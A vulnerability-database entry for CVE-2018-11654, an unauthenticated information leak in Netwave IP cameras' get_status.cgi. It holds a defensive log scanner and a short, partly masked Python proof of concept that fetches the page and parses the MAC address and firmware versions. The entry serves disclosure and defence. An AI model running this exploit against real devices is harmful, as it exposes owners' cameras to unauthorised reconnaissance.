Netwave IP Camera Information Disclosure Vulnerability (CVE-2018-11654)

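Basic fields

Vulnerability ID: SSV-97785
Disclosure/discovery date: Unknown
Submission date: 2019-02-11
Severity:
Vulnerability category: Information disclosure
Affected component: Netwave IP camera
Vulnerability author: David Castro
Submitter: Knownsec
CVE-ID: CVE-2018-11654
CNNVD-ID: CNNVD-201808-820
CNVD-ID:
ZoomEye Dork: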

Vulnerability details

Information disclosure in Netwave IP camera at get_status.cgi allows an unauthenticated attacker to exfiltrate sensitive information from the device.
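
A defender-side check for the exposure described above, added here as an example and not part of the original entry or the author's PoC: it scans access logs for `get_status.cgi` requests that were answered with 200 without an authenticated user. It assumes the camera sits behind a reverse proxy that enforces authentication and writes Combined Log Format; the log lines below are constructed samples.

```python
import re
from collections import defaultdict

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.23 - - [11/Feb/2019:10:02:11 +0000] "GET /get_status.cgi HTTP/1.1" 200 412 "-" "python-requests/2.21.0"',
    '198.51.100.23 - - [11/Feb/2019:10:02:15 +0000] "GET /get_status.cgi?t=1 HTTP/1.1" 200 412 "-" "python-requests/2.21.0"',
    '192.0.2.10 - admin [11/Feb/2019:10:05:40 +0000] "GET /get_status.cgi HTTP/1.1" 200 412 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [11/Feb/2019:10:06:02 +0000] "GET /get_status.cgi HTTP/1.1" 401 0 "-" "curl/7.61.0"',
    '203.0.113.7 - - [11/Feb/2019:10:06:09 +0000] "GET /index.htm HTTP/1.1" 200 1033 "-" "curl/7.61.0"',
]

def is_status_leak(line):
    """Return the parsed hit if the line is an unauthenticated 200 for get_status.cgi."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not a Combined Log Format line
    # Compare the last path segment so query strings and path prefixes still match.
    name = m["target"].split("?", 1)[0].rstrip("/").rsplit("/", 1)[-1].lower()
    if name != "get_status.cgi":
        return None
    if m["status"] != "200" or m["user"] != "-":
        return None  # request was refused, or served to an authenticated user
    return {"ip": m["ip"], "time": m["time"], "target": m["target"]}

def summarize(lines):
    """Group unauthenticated get_status.cgi responses by client address."""
    hits = defaultdict(list)
    for line in lines:
        hit = is_status_leak(line)
        if hit:
            hits[hit["ip"]].append(hit["time"])
    return dict(hits)

if __name__ == "__main__":
    for ip, times in summarize(SAMPLE_LOG).items():
        print(f"{ip}: {len(times)} unauthenticated get_status.cgi response(s), first at {times[0]}")
```

Any hit means the status page was served without credentials, so the device or the proxy rule in front of it needs attention.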

PoC (not a pocsuite plugin)

```python
import requests
import sys
'''
Author: David Castro (SadFud)
Contact: https://twitter.com/SadFud75
CVE: CVE-2018-11654
Output example:
Mac address: 006E0604AF62
System version: 0.37.2.46
App version: 0.2.9.12
Alias: NOA
The target http://REDACTED:8000 is vulnerable to CVE-2018-11653.
'''
# The base URL of the device is taken from the first command-line argument
url = sys.argv[1] + "/get_status.cgi"
r = requests.get(url)
if r.status_code != 200:
    print("Error. Target not exploitable.")
    sys.exit()
print("Parsing data...")
# Strip the JavaScript assignment syntax so each line reads "name value"
r = r.text
r = r.replace('\';', '')
r = r.replace('var ', '')
r = r.replace('=\'', ' ')
todo = r.split("\n")
# Line 14 of the response holds a numeric flag in the form name=value;
wifi = str(todo[14]).split('=')
if wifi[1].replace(';', '') == str(1):
    check = "The target " + sys.argv[1] + " is vulnerable to CVE-2018-11653."
else:
    check = "The target " + sys.argv[1] + " is not vulnerable to CVE-2018-11653."
# The first three lines carry the MAC address, system version and app version
mac = todo[0].split(' ')
mac = mac[1]
sysver = todo[1].split(' ')  # renamed from "sys" so the sys module is not shadowed
sysver = sysver[1]
app = todo[2].split(' ')
app = app[1]
# The remainder of the listing is masked on the source page.
```

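Solutions

Temporary solution

No temporary solution is available.

Official solution

No official solution is available.

Protection

No protection scheme is available.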

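※ All content, code and services provided by this site are for learning purposes only. Do not use them for illegal purposes; otherwise you bear the consequences yourself.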